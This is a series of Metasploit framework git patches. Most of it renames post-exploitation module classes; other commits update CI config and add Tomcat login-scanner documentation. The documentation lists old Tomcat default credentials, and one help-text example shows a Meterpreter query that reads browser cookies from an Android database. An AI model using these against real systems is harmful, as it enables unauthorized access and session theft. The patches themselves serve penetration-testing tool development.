100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rbconfig' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info(info, 'Name' => 'Windows Gather Screen Spy', diff --git a/modules/post/windows/gather/smart_hashdump.rb b/modules/post/windows/gather/smart_hashdump.rb index a8bb720d7c..4a1f6c4dba 100644 --- a/modules/post/windows/gather/smart_hashdump.rb +++ b/modules/post/windows/gather/smart_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/tcpnetstat.rb b/modules/post/windows/gather/tcpnetstat.rb index e330a2f85e..76566231ff 100644 --- a/modules/post/windows/gather/tcpnetstat.rb +++ b/modules/post/windows/gather/tcpnetstat.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/usb_history.rb b/modules/post/windows/gather/usb_history.rb index 0ec0abc5b5..17af8ff7fc 100644 --- a/modules/post/windows/gather/usb_history.rb +++ b/modules/post/windows/gather/usb_history.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/win_privs.rb b/modules/post/windows/gather/win_privs.rb index cfb8d78d09..acb6e8dfa7 100644 --- a/modules/post/windows/gather/win_privs.rb +++ b/modules/post/windows/gather/win_privs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/wmic_command.rb b/modules/post/windows/gather/wmic_command.rb index f87345d3bc..65af916b48 100644 --- a/modules/post/windows/gather/wmic_command.rb +++ b/modules/post/windows/gather/wmic_command.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::WMIC diff --git a/modules/post/windows/gather/word_unc_injector.rb b/modules/post/windows/gather/word_unc_injector.rb index 2cf7b95db8..2c727a4677 100644 --- a/modules/post/windows/gather/word_unc_injector.rb +++ b/modules/post/windows/gather/word_unc_injector.rb @@ -18,7 +18,7 @@ require 'msf/core' # for creating files require 'rex/zip' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index dae3289121..7eae317a56 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index 69a1bdd01e..a894ae01d3 100644 --- a/modules/post/windows/manage/autoroute.rb +++ b/modules/post/windows/manage/autoroute.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) diff --git a/modules/post/windows/manage/change_password.rb b/modules/post/windows/manage/change_password.rb index beadeb3bce..889f5af7b9 100644 --- a/modules/post/windows/manage/change_password.rb +++ b/modules/post/windows/manage/change_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/clone_proxy_settings.rb b/modules/post/windows/manage/clone_proxy_settings.rb index a3f841c3b4..c270e7bd94 100644 --- a/modules/post/windows/manage/clone_proxy_settings.rb +++ b/modules/post/windows/manage/clone_proxy_settings.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/manage/delete_user.rb b/modules/post/windows/manage/delete_user.rb index c59d4d2d73..5cc08d1e83 100644 --- a/modules/post/windows/manage/delete_user.rb +++ b/modules/post/windows/manage/delete_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/manage/download_exec.rb b/modules/post/windows/manage/download_exec.rb index ef5e9e94e6..b920f64184 100644 --- a/modules/post/windows/manage/download_exec.rb +++ b/modules/post/windows/manage/download_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/manage/driver_loader.rb b/modules/post/windows/manage/driver_loader.rb index 3cdcdb527e..9558084429 100644 --- a/modules/post/windows/manage/driver_loader.rb +++ b/modules/post/windows/manage/driver_loader.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index eba215376a..e798ac70a0 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Accounts include Msf::Post::Windows::Registry diff --git a/modules/post/windows/manage/enable_support_account.rb b/modules/post/windows/manage/enable_support_account.rb index e2731523a0..c5a949c3f6 100644 --- a/modules/post/windows/manage/enable_support_account.rb +++ b/modules/post/windows/manage/enable_support_account.rb @@ -1,7 +1,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/exec_powershell.rb b/modules/post/windows/manage/exec_powershell.rb index 00c3d41ee5..11b6659f6b 100644 --- a/modules/post/windows/manage/exec_powershell.rb +++ b/modules/post/windows/manage/exec_powershell.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/powershell' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb index 31bafaa9ff..d8dbf4ee18 100644 --- a/modules/post/windows/manage/forward_pageant.rb +++ b/modules/post/windows/manage/forward_pageant.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'tmpdir' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv def initialize(info = {}) diff --git a/modules/post/windows/manage/ie_proxypac.rb b/modules/post/windows/manage/ie_proxypac.rb index 1f373735f1..82ff84eb6b 100644 --- a/modules/post/windows/manage/ie_proxypac.rb +++ b/modules/post/windows/manage/ie_proxypac.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File diff --git a/modules/post/windows/manage/inject_ca.rb b/modules/post/windows/manage/inject_ca.rb index cd651b78ef..f86f5cdf0d 100644 --- a/modules/post/windows/manage/inject_ca.rb +++ b/modules/post/windows/manage/inject_ca.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/inject_host.rb b/modules/post/windows/manage/inject_host.rb index f0f3f17127..0151db3970 100644 --- a/modules/post/windows/manage/inject_host.rb +++ b/modules/post/windows/manage/inject_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/migrate.rb b/modules/post/windows/manage/migrate.rb index e907085bdb..5dd4e6259d 100644 --- a/modules/post/windows/manage/migrate.rb +++ b/modules/post/windows/manage/migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/mssql_local_auth_bypass.rb b/modules/post/windows/manage/mssql_local_auth_bypass.rb index 59ba9d091d..5d14a36694 100644 --- a/modules/post/windows/manage/mssql_local_auth_bypass.rb +++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/mssql' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::MSSQL diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb index 5cc4a3ca0d..4900e1fc64 100644 --- a/modules/post/windows/manage/multi_meterpreter_inject.rb +++ b/modules/post/windows/manage/multi_meterpreter_inject.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) diff --git a/modules/post/windows/manage/nbd_server.rb b/modules/post/windows/manage/nbd_server.rb index c91a797d86..41f786ac8c 100644 --- a/modules/post/windows/manage/nbd_server.rb +++ b/modules/post/windows/manage/nbd_server.rb @@ -13,7 +13,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index 50f6cc7959..10c6317646 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/common' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Common diff --git a/modules/post/windows/manage/portproxy.rb b/modules/post/windows/manage/portproxy.rb index ddd861c9d7..2fc0584665 100644 --- a/modules/post/windows/manage/portproxy.rb +++ b/modules/post/windows/manage/portproxy.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/manage/powershell/exec_powershell.rb b/modules/post/windows/manage/powershell/exec_powershell.rb index 4bcad9e1b4..8707cb705e 100644 --- a/modules/post/windows/manage/powershell/exec_powershell.rb +++ b/modules/post/windows/manage/powershell/exec_powershell.rb @@ -17,7 +17,7 @@ require 'zlib' # TODO: check if this can be done with REX require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/powershell/load_script.rb b/modules/post/windows/manage/powershell/load_script.rb index 7eb56ad20a..e3d270f9e9 100644 --- a/modules/post/windows/manage/powershell/load_script.rb +++ b/modules/post/windows/manage/powershell/load_script.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/pptp_tunnel.rb b/modules/post/windows/manage/pptp_tunnel.rb index ddb642f3a8..4f71034b08 100644 --- a/modules/post/windows/manage/pptp_tunnel.rb +++ b/modules/post/windows/manage/pptp_tunnel.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index ec61308511..45d2de743d 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/pxeexploit.rb b/modules/post/windows/manage/pxeexploit.rb index f074bbc4ae..8692ed4a64 100644 --- a/modules/post/windows/manage/pxeexploit.rb +++ b/modules/post/windows/manage/pxeexploit.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb index 52199ca9e7..f52eac1e24 100644 --- a/modules/post/windows/manage/reflective_dll_inject.rb +++ b/modules/post/windows/manage/reflective_dll_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::ReflectiveDLLInjection diff --git a/modules/post/windows/manage/remove_ca.rb b/modules/post/windows/manage/remove_ca.rb index 7dab48fe30..2a2437d0d2 100644 --- a/modules/post/windows/manage/remove_ca.rb +++ b/modules/post/windows/manage/remove_ca.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/remove_host.rb b/modules/post/windows/manage/remove_host.rb index 0fea20c4c2..9f78208ea3 100644 --- a/modules/post/windows/manage/remove_host.rb +++ b/modules/post/windows/manage/remove_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/rpcapd_start.rb b/modules/post/windows/manage/rpcapd_start.rb index 5aee248326..b49600378b 100644 --- a/modules/post/windows/manage/rpcapd_start.rb +++ b/modules/post/windows/manage/rpcapd_start.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index 89f71183d5..36137acf65 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Runas diff --git a/modules/post/windows/manage/sdel.rb b/modules/post/windows/manage/sdel.rb index 61a2944b75..a2691cc1d4 100644 --- a/modules/post/windows/manage/sdel.rb +++ b/modules/post/windows/manage/sdel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File diff --git a/modules/post/windows/manage/smart_migrate.rb b/modules/post/windows/manage/smart_migrate.rb index 7c011b9e1e..9abc02bc75 100644 --- a/modules/post/windows/manage/smart_migrate.rb +++ b/modules/post/windows/manage/smart_migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Module::Deprecated diff --git a/modules/post/windows/manage/vss_create.rb b/modules/post/windows/manage/vss_create.rb index 47345660fd..a377af66a8 100644 --- a/modules/post/windows/manage/vss_create.rb +++ b/modules/post/windows/manage/vss_create.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_list.rb b/modules/post/windows/manage/vss_list.rb index a9c94e7083..35737fb343 100644 --- a/modules/post/windows/manage/vss_list.rb +++ b/modules/post/windows/manage/vss_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_mount.rb b/modules/post/windows/manage/vss_mount.rb index 14dd3328c2..d71fe54b43 100644 --- a/modules/post/windows/manage/vss_mount.rb +++ b/modules/post/windows/manage/vss_mount.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_set_storage.rb b/modules/post/windows/manage/vss_set_storage.rb index 472419a533..c61fd6e128 100644 --- a/modules/post/windows/manage/vss_set_storage.rb +++ b/modules/post/windows/manage/vss_set_storage.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_storage.rb b/modules/post/windows/manage/vss_storage.rb index 9cb3f9c56b..599902d94c 100644 --- a/modules/post/windows/manage/vss_storage.rb +++ b/modules/post/windows/manage/vss_storage.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/webcam.rb b/modules/post/windows/manage/webcam.rb index def92fa91d..eb156773d4 100644 --- a/modules/post/windows/manage/webcam.rb +++ b/modules/post/windows/manage/webcam.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index 9ae5730849..cc2ad55784 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/recon/outbound_ports.rb b/modules/post/windows/recon/outbound_ports.rb index 7dea6857a3..31196ce2c6 100644 --- a/modules/post/windows/recon/outbound_ports.rb +++ b/modules/post/windows/recon/outbound_ports.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb index 02ad4f0376..4e3028f341 100644 --- a/modules/post/windows/recon/resolve_ip.rb +++ b/modules/post/windows/recon/resolve_ip.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/wlan/wlan_bss_list.rb b/modules/post/windows/wlan/wlan_bss_list.rb index f9669457d6..00baa5c710 100644 --- a/modules/post/windows/wlan/wlan_bss_list.rb +++ b/modules/post/windows/wlan/wlan_bss_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_current_connection.rb b/modules/post/windows/wlan/wlan_current_connection.rb index faa5337cc2..a34db4f8c2 100644 --- a/modules/post/windows/wlan/wlan_current_connection.rb +++ b/modules/post/windows/wlan/wlan_current_connection.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_disconnect.rb b/modules/post/windows/wlan/wlan_disconnect.rb index 231923f697..20ef90546a 100644 --- a/modules/post/windows/wlan/wlan_disconnect.rb +++ b/modules/post/windows/wlan/wlan_disconnect.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_profile.rb b/modules/post/windows/wlan/wlan_profile.rb index 4eab8dc9dc..b16b0965e7 100644 --- a/modules/post/windows/wlan/wlan_profile.rb +++ b/modules/post/windows/wlan/wlan_profile.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Post +class Metasploit3 < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) From 204138c7c1d5483a47e9ffab7230122846ac5993 Mon Sep 17 00:00:00 2001 From: darkbushido Date: Mon, 7 Mar 2016 13:25:37 -0600 Subject: [PATCH 511/686] changing this to postgres 9.3 re-ordering stuff in .travis.yml --- .travis.yml | 25 +++++++++++-------------- 1 file changed, 11 insertions(+), 14 deletions(-) diff --git a/.travis.yml b/.travis.yml index 3e8fe251bb..97540b358a 100644 --- a/.travis.yml +++ b/.travis.yml @@ -2,12 +2,21 @@ sudo: false group: stable bundler_args: --without coverage development pcap cache: bundler +addons: + postgresql: '9.3' + apt: + packages: + - libpcap-dev + - graphviz +language: ruby +rvm: + - '2.1.8' + env: - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true - RAKE_TASKS=spec SPEC_OPTS="--tag content" - RAKE_TASKS=spec SPEC_OPTS="--tag ~content" -language: ruby matrix: fast_finish: true before_install: @@ -25,8 +34,6 @@ before_script: script: # fail build if db/schema.rb update is not committed - git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS -rvm: - - '2.1.8' notifications: irc: "irc.freenode.org#msfnotify" @@ -38,14 +45,4 @@ git: branches: except: - gh-pages - - metakitty - -addons: - postgresql: '9.5' - apt: - packages: - - libpcap-dev - - graphviz - -services: - - postgresql \ No newline at end of file + - metakitty \ No newline at end of file From c2f99b559cc78d7bd10617c9b61d1b36b05f0958 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 7 Mar 2016 15:39:15 -0600 Subject: [PATCH 512/686] Add documentation for auxiliary/scanner/http/tomcat_enum Also fix a typo in normalizer --- lib/msf/util/document_generator/normalizer.rb | 2 +- modules/auxiliary/scanner/http/tomcat_enum.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index 02a11c9544..635d7fda81 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -254,7 +254,7 @@ module Msf elsif mod.kind_of?(Msf::Payload) load_template(mod, PAYLOAD_DEMO_TEMPLATE) elsif mod.kind_of?(Msf::Auxiliary::Scanner) - load_template(mod, AUXILIARY_SCANNER_TEMPLATE) + load_template(mod, AUXILIARY_SCANNER_DEMO_TEMPLATE) elsif is_remote_exploit?(mod) load_template(mod, REMOTE_EXPLOIT_DEMO_TEMPLATE) else diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 9a4c1e244f..9485355e03 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary File.join(Msf::Config.data_directory, "wordlists", "tomcat_mgr_default_users.txt") ]), ], self.class) - deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME') + deregister_options('PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS') end def has_j_security_check? From 26b64a0702b568f4f60e38adddeacb81761347be Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 7 Mar 2016 15:41:03 -0600 Subject: [PATCH 513/686] Add correct doc for tomcat_mgr_login --- .../scanner/http/tomcat_mgr_login.md | 51 +++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md diff --git a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md new file mode 100644 index 0000000000..742c2fa780 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md @@ -0,0 +1,51 @@ +The auxiliary/scanner/http/tomcat_mgr_login works for Tomcat versions that uses HTTP +authentication. + +Please note that for Tomcat 7 or newer, the roles required to use the manager application were +changed from the single manager role to the following four roles: + +* manager-gui - allows access to the HTML GUI and the status pages. +* manager-script - allows access to the text interface and the status pages. +* manager-jmx - allows access to the JMX and the status pages. +* manager-status - allows access to the status pages only. + +Older versions of Tomcat came with default passwords enabled by default. For example: + +**Tomcat 4** + +``` +| Username | Password | Role | +| -------- | -------- | ------------- | +| tomcat | tomcat | tomcat | +| role1 | tomcat | role1 | +| both | tomcat | tomcat, role1 | +``` + +**Tomcat 5** + +Same as Tomcat 4 + +Newer Tomcat versions have these passwords commented out. + +If you are using the default Metasploit credential lists, these usernames and passwords are already +loaded. + + +## Vulnerable Application + +--- + +To download the vulnerable application, you can find it here: + +https://tomcat.apache.org/whichversion.html + +## Verification Steps + +--- + +Please see Overview for usage. + +1. Do: ```auxiliary/scanner/http/tomcat_mgr_login``` +2. Do: ```set RHOSTS [IP]``` +3. Set TARGETURI if necessary. +4. Do: ```run``` From ee63464b8c1f164227bb632680c5835c9f1660a7 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 7 Mar 2016 15:41:54 -0600 Subject: [PATCH 514/686] Update doc --- .../modules/auxiliary/scanner/http/tomcat_mgr_login.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md index 742c2fa780..898b505370 100644 --- a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md +++ b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md @@ -43,8 +43,6 @@ https://tomcat.apache.org/whichversion.html --- -Please see Overview for usage. - 1. Do: ```auxiliary/scanner/http/tomcat_mgr_login``` 2. Do: ```set RHOSTS [IP]``` 3. Set TARGETURI if necessary. From f6c06bedfe9f1759d2f4eaee633ae41b83865c03 Mon Sep 17 00:00:00 2001 From: Tim Date: Mon, 7 Mar 2016 23:15:05 +0000 Subject: [PATCH 515/686] fix e.g output --- .../post/meterpreter/ui/console/command_dispatcher/android.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 9bcd0f8683..a679cdd8bc 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -576,7 +576,7 @@ class Console::CommandDispatcher::Android if database.blank? || query.blank? print_error("You must enter both a database files and a query") - print_error("e.g. sqlite_query -d /sdcard/Download/webviewCookiesChromium.db -q 'SELECT * from cookies'") + print_error("e.g. sqlite_query -d /data/data/com.android.browser/databases/webviewCookiesChromium.db -q 'SELECT * from cookies'") print_line(sqlite_query_opts.usage) return end From 5e83b2de515374bed71bf3846d5a700c32413edd Mon Sep 17 00:00:00 2001 From: Tim Date: Mon, 7 Mar 2016 23:17:45 +0000 Subject: [PATCH 516/686] remove extra new line --- lib/rex/post/meterpreter/extensions/android/android.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index b1b21895ae..c653b693f5 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -314,4 +314,3 @@ end end end end - From 3123175ac75c38bec5165e01cda05e3b38287003 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 8 Mar 2016 14:02:44 +0100 Subject: [PATCH 517/686] use MetasploitModule as a class name --- lib/msf/core/exploit/ftpserver.rb | 3 +-- lib/msf/core/exploit/smb/server/share.rb | 4 ++-- lib/msf/core/modules/loader/base.rb | 14 +++++++------- .../auxiliary/admin/2wire/xslt_password_reset.rb | 2 +- .../android/google_play_store_uxss_xframe_rce.rb | 2 +- .../admin/appletv/appletv_display_image.rb | 2 +- .../admin/appletv/appletv_display_video.rb | 2 +- modules/auxiliary/admin/atg/atg_client.rb | 2 +- modules/auxiliary/admin/backupexec/dump.rb | 2 +- modules/auxiliary/admin/backupexec/registry.rb | 2 +- .../auxiliary/admin/chromecast/chromecast_reset.rb | 2 +- .../admin/chromecast/chromecast_youtube.rb | 2 +- .../admin/cisco/cisco_secure_acs_bypass.rb | 2 +- .../auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb | 2 +- modules/auxiliary/admin/db2/db2rcmd.rb | 2 +- .../admin/edirectory/edirectory_dhost_cookie.rb | 2 +- .../admin/edirectory/edirectory_edirutil.rb | 2 +- .../admin/emc/alphastor_devicemanager_exec.rb | 2 +- .../admin/emc/alphastor_librarymanager_exec.rb | 2 +- modules/auxiliary/admin/firetv/firetv_youtube.rb | 2 +- .../auxiliary/admin/hp/hp_data_protector_cmd.rb | 2 +- .../admin/hp/hp_imc_som_create_account.rb | 2 +- .../http/arris_motorola_surfboard_backdoor_xss.rb | 2 +- 